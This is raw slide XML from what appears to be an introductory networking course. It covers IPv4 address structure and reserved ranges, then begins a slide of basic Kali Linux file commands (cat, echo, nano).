        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="3468624"/>
            <a:ext cx="6705600" cy="704215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9144">
            <a:solidFill>
              <a:srgbClr val="585858"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr kern="0"/>
            </a:defPPr>
          </a:lstStyle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3200" i="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>73.5.12.132</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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0305B89-5F61-6B88-5755-E7C7C8A417D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="114046"/>
            <a:ext cx="7936052" cy="737458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="288366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27455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lang="en-US" dirty="0"/>
              <a:t>6 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>IPv4 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Addresses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E407759-B347-F085-176B-EC8B9428B2C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474185" y="1984804"/>
            <a:ext cx="621030" cy="2310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4610"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>EXAMPLE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66EEEA6-F4C0-CB89-FD8F-56ADEE47F8AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1653920" y="1710690"/>
            <a:ext cx="6602730" cy="1500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vast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majority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networks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run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IP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version</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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(IPv4).</a:t>
            </a:r>
            <a:endParaRPr sz="22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2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IPv4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address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consists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four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bytes,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octets;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endParaRPr sz="2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byte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consists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8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bits.</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr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A50EBBE3-6CF6-1FD2-189E-F8BD443500C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1633727" y="1013524"/>
            <a:ext cx="7014972" cy="106616"/>
            <a:chOff x="1633727" y="1013523"/>
            <a:chExt cx="7014972" cy="106616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2D585DD1-8803-54E1-3A37-0DD6D3B2B67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3727" y="1013523"/>
              <a:ext cx="7014972" cy="106616"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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1C1DCEA2-61B4-35DF-EA98-C5757D952B33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1677161" y="1049274"/>
              <a:ext cx="6920865" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6920865">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6920738" y="0"/>
                  </a:lnTo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8EC81B6-F424-09AF-B492-2ECE524F11AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110353" y="4836078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A59EA0C-FC66-1E93-70ED-1EEC2487CE06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110353" y="4846724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55</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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0A5BD0-F07D-C076-FA24-83698D6CC1F7}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2314440" y="347760"/>
              <a:ext cx="5315400" cy="362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0A5BD0-F07D-C076-FA24-83698D6CC1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5080" y="338400"/>
                <a:ext cx="5334120" cy="36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6707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2D953C2-65FE-B135-63C5-851E74650377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7C6EFA5-698B-1D60-C5FE-54FDD15B0427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 6 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IPv4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Addresses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675BBCD-D1ED-2A70-CC4A-E96D216424B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2407755" y="3259189"/>
            <a:ext cx="990600" cy="360045"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="990600" h="360045">
                <a:moveTo>
                  <a:pt x="990600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="988238" y="69996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="981805" y="127158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972276" y="165699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="960627" y="179831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525272" y="179831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513623" y="193964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504094" y="232505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497661" y="289667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495300" y="359663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492938" y="289667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486505" y="232505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="476976" y="193964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465327" y="179831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29972" y="179831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18323" y="165699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8794" y="127158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2361" y="69996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo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51D27FC-8F78-054B-36F2-313A328315CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506046" y="3259189"/>
            <a:ext cx="1420495" cy="360045"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1420495" h="360045">
                <a:moveTo>
                  <a:pt x="1420367" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1418006" y="69996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411573" y="127158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1402044" y="165699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390396" y="179831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740156" y="179831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="728507" y="193964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718978" y="232505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="712545" y="289667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="710184" y="359663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707822" y="289667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701389" y="232505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="691860" y="193964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680212" y="179831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29972" y="179831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18323" y="165699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8794" y="127158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2361" y="69996"/>
                </a:ln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AC5B29A6-3F90-6CED-982A-4163B1CC165E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1684339"/>
            <a:ext cx="6337300" cy="233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dot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delimits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every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octet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address.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2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1800225">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="5400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>73.5.12.132</a:t>
            </a:r>
            <a:endParaRPr sz="5400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2236470">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2430"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2997835" algn="l"/>
                <a:tab pos="4196080" algn="l"/>
                <a:tab pos="5410200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>First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Second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Third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Fourth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EB1427AC-180C-5381-DE9C-B1276A377358}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3469983" y="3268333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5">
                <a:moveTo>
                  <a:pt x="864108" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="861746" y="69996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855313" y="127158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845784" y="165699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="834136" y="179832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462025" y="179832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450377" y="193964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440848" y="232505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434415" y="289667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432054" y="359664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429692" y="289667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423259" y="232505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413730" y="193964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402082" y="179832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29972" y="179832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18323" y="165699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8794" y="127158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2361" y="69996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo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1C13EC8-9573-C5EA-8C92-F444DC98E085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428578" y="3268333"/>
            <a:ext cx="1057910" cy="360045"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1057910" h="360045">
                <a:moveTo>
                  <a:pt x="1057655" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1055294" y="69996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1048861" y="127158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039332" y="165699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1027684" y="179832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558800" y="179832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547151" y="193964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537622" y="232505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531189" y="289667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528827" y="359664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526466" y="289667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520033" y="232505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510504" y="193964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="498855" y="179832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29972" y="179832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18323" y="165699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8794" y="127158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2361" y="69996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo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FBE1DE62-F089-A18E-0288-23B64EF6F99E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9647168F-C975-BC61-D46F-0B3962557AE7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56</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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F62121-CD1B-B419-FFCF-656F2E4F4E0C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="766800" y="2104920"/>
              <a:ext cx="5867640" cy="204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F62121-CD1B-B419-FFCF-656F2E4F4E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440" y="2095560"/>
                <a:ext cx="5886360" cy="20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68220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DA57E8B-6862-1024-7A09-1D81CB1C9AC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462141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E0A1F4E-9364-8470-B0DF-266B38593603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549567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6  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IPv4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Addresses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6339D17-44B0-A815-885E-CAE8720C0FE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248644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F3F6FC8-5C0F-00F0-33E0-A39602084D03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248644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57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5C24071-EA8E-F068-7757-783E2D27B2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510858" y="1629475"/>
            <a:ext cx="8122284" cy="236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may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recall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introduction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module,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with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8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bits,</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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represent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up</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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b="1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2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" baseline="24305" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="225" baseline="243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different</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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values</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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0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255.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Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" marR="357505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This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does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mean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assign</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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any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address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starting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0.0.0.0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255.255.255.255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host.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Some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addresses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reserved</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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special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purposes.</a:t>
            </a:r>
            <a:endParaRPr sz="24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043133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4C1B2FD-C251-65FD-B813-FCFF7483BFBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447206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C8A19D9-14D2-E8E6-44BC-856D059F8DDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534632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6 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IPv4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Addresses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C00C561-328E-68F1-EEC2-8951D6E1262C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525793" y="4836074"/>
            <a:ext cx="1716405" cy="1600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http://tools.ietf.org/html/rfc5735</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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0B06FA1-D360-1D4D-FECB-667A6D74A7C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233709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507D457-C159-1131-BDF1-65C923C20F4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233709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58</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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45F5C08-46EC-8170-8F27-167498154734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534023" y="1036790"/>
            <a:ext cx="8084184" cy="36906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example,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some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reserved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intervals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are:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1038225" marR="1165860" indent="-457834">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="620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0.0.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-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0.255.255.255</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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representing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="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"this"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network.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1038225" indent="-457200">
              <a:lnSpc>
                <a:spcPts val="2740"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250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127.0.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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127.255.255.255</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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representing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local</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1038225">
              <a:lnSpc>
                <a:spcPts val="274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host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(e.g.,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your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computer).</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1038225" marR="654050" indent="-457834">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="615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192.168.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-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192.168.255.255</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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reserved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for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private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networks.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2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="890905">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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find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details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about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special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IPv4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addresses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Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>RFC5735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074511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1F12034-EB6C-4D2D-6E84-C140F50907E6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293BC99-A81A-1197-F3B1-B200A28192EF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6 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IPv6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472F32A7-827D-EF99-68E0-D1D7F8E3CF8C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BEB4B22-C781-B7C5-21CB-46874A505605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59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2B6A803-2912-BCC0-C78C-0B83BFCCF4C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1813041"/>
            <a:ext cx="7858759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IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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addresses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being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consumed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rapidly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due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large number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new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devices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connecting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internet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every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day.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day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IPv4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addresses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might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exhausted.</a:t>
            </a:r>
            <a:endParaRPr sz="24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5284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2860-4B09-4041-163D-FB06CE33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6FBFF-85B5-7478-ADC1-23526C5F8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5D053D5-0157-0C61-F664-2F64BDB48DDD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91A9D38-D77A-EF76-DF00-0F92D2D1C4A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A45C7AE-832E-18CC-F7DF-D55E177B309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6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CBC27DF-BFB9-93AC-8E80-80055EF58996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6518542B-F2DD-F75F-803B-7B613AA598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3A8A43D1-402E-553B-2C7B-C98951FEF477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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3FCF9541-384C-3193-74AB-4E5E6BD93465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84461220-A06D-F96A-7F8A-FAE8390E7168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893DEF8E-B328-4727-8C1E-68A1D612BD2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857D25F0-39FF-7058-03AF-B2DC5B971396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DBA35E04-D2BF-05B7-EE7F-31CA89F96433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9B7ADA3D-1F2D-D2C0-B8EE-C2344D13D3B5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6</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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6F82C17B-A233-86C6-5408-6674FC1EB6A6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1.2 All Kali Linux commands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05B163B7-2F9F-0B62-0754-B3D5A66C670A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485140" y="1706880"/>
            <a:ext cx="2515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 -cat file name       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65EFDF-6C35-DD12-4114-FD15FCFDA1F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="219075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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C26977B9-F3D9-7327-CD8C-DD725751AB11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="1951990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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>contant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file  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11D8B533-9D88-AC31-BFAB-9B9B5B6EB75C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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-echo “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>contant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ” &gt; file name    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6D76E7-A020-13C3-6F35-2D133D3EC7B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3745736" y="2608915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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BFE85CB-686E-715E-F163-3168808505B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052249" y="2387599"/>
            <a:ext cx="3067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write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>contant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the file  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9B7F67E-0610-9703-8879-7DDC1293C7EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2724150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nano file name  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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47A823C-DDC3-875F-9209-8B225107B64E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729230" y="2945001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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
